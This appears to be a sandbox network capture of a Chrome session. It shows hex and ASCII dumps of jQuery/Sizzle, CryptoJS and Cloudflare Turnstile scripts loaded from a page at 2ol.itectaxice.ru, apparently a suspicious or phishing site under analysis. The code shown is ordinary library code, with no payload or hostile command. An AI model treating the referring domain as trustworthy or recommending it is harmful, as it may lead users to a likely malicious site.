                                                      2025-01-14 15:11:22 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                      Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                      2025-01-14 15:11:22 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                      Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                      2025-01-14 15:11:22 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                      Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.749721104.18.94.414433232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-14 15:11:21 UTC649OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://2ol.itectaxice.ru/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-14 15:11:22 UTC386INHTTP/1.1 302 Found
                                                      Date: Tue, 14 Jan 2025 15:11:21 GMT
                                                      Content-Length: 0
                                                      Connection: close
                                                      access-control-allow-origin: *
                                                      cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                      cross-origin-resource-policy: cross-origin
                                                      location: /turnstile/v0/b/e0c90b6a3ed1/api.js
                                                      Server: cloudflare
                                                      CF-RAY: 901e8ee26e2e7285-EWR
                                                      alt-svc: h3=":443"; ma=86400


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.749722104.17.25.144433232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-14 15:11:21 UTC651OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                      Host: cdnjs.cloudflare.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://2ol.itectaxice.ru/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-14 15:11:22 UTC958INHTTP/1.1 200 OK
                                                      Date: Tue, 14 Jan 2025 15:11:21 GMT
                                                      Content-Type: application/javascript; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Access-Control-Allow-Origin: *
                                                      Cache-Control: public, max-age=30672000
                                                      ETag: W/"61182885-40eb"
                                                      Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                      cf-cdnjs-via: cfworker/kv
                                                      Cross-Origin-Resource-Policy: cross-origin
                                                      Timing-Allow-Origin: *
                                                      X-Content-Type-Options: nosniff
                                                      CF-Cache-Status: HIT
                                                      Age: 525292
                                                      Expires: Sun, 04 Jan 2026 15:11:21 GMT
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8gCrCN%2FygLE78mGB8Bc9A0kBPTLTWt7svrEyCVZefUunGGgiU5jV3rzdXeSuYbfFjH9pUsAATwdxW4hE0ELjqsF4ROMynTer%2BA33NqESeRzJS8UevkPmB%2FBTI0JLpJvzBV2fP3VU"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                      Strict-Transport-Security: max-age=15780000
                                                      Server: cloudflare
                                                      CF-RAY: 901e8ee26ebcf799-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2025-01-14 15:11:22 UTC411INData Raw: 37 62 66 33 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                      Data Ascii: 7bf3!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                      2025-01-14 15:11:22 UTC1369INData Raw: 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61
                                                      Data Ascii: globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.crea
                                                      2025-01-14 15:11:22 UTC1369INData Raw: 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29
                                                      Data Ascii: all(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)
                                                      2025-01-14 15:11:22 UTC1369INData Raw: 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b
                                                      Data Ascii: eof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;
                                                      2025-01-14 15:11:22 UTC1369INData Raw: 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30
                                                      Data Ascii: ar t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0
                                                      2025-01-14 15:11:22 UTC1369INData Raw: 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d
                                                      Data Ascii: or(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]
                                                      2025-01-14 15:11:22 UTC1369INData Raw: 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75
                                                      Data Ascii: ,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:fu
                                                      2025-01-14 15:11:22 UTC1369INData Raw: 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51
                                                      Data Ascii: arAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQ
                                                      2025-01-14 15:11:22 UTC1369INData Raw: 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73
                                                      Data Ascii: .sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this
                                                      2025-01-14 15:11:22 UTC1369INData Raw: 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b
                                                      Data Ascii: ,m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.749724104.18.94.414433232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-14 15:11:22 UTC648OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://2ol.itectaxice.ru/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-14 15:11:22 UTC471INHTTP/1.1 200 OK
                                                      Date: Tue, 14 Jan 2025 15:11:22 GMT
                                                      Content-Type: application/javascript; charset=UTF-8
                                                      Content-Length: 47521
                                                      Connection: close
                                                      accept-ranges: bytes
                                                      last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                      cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                      access-control-allow-origin: *
                                                      cross-origin-resource-policy: cross-origin
                                                      Server: cloudflare
                                                      CF-RAY: 901e8ee65c14c33b-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2025-01-14 15:11:22 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                      Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                      2025-01-14 15:11:22 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                      Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
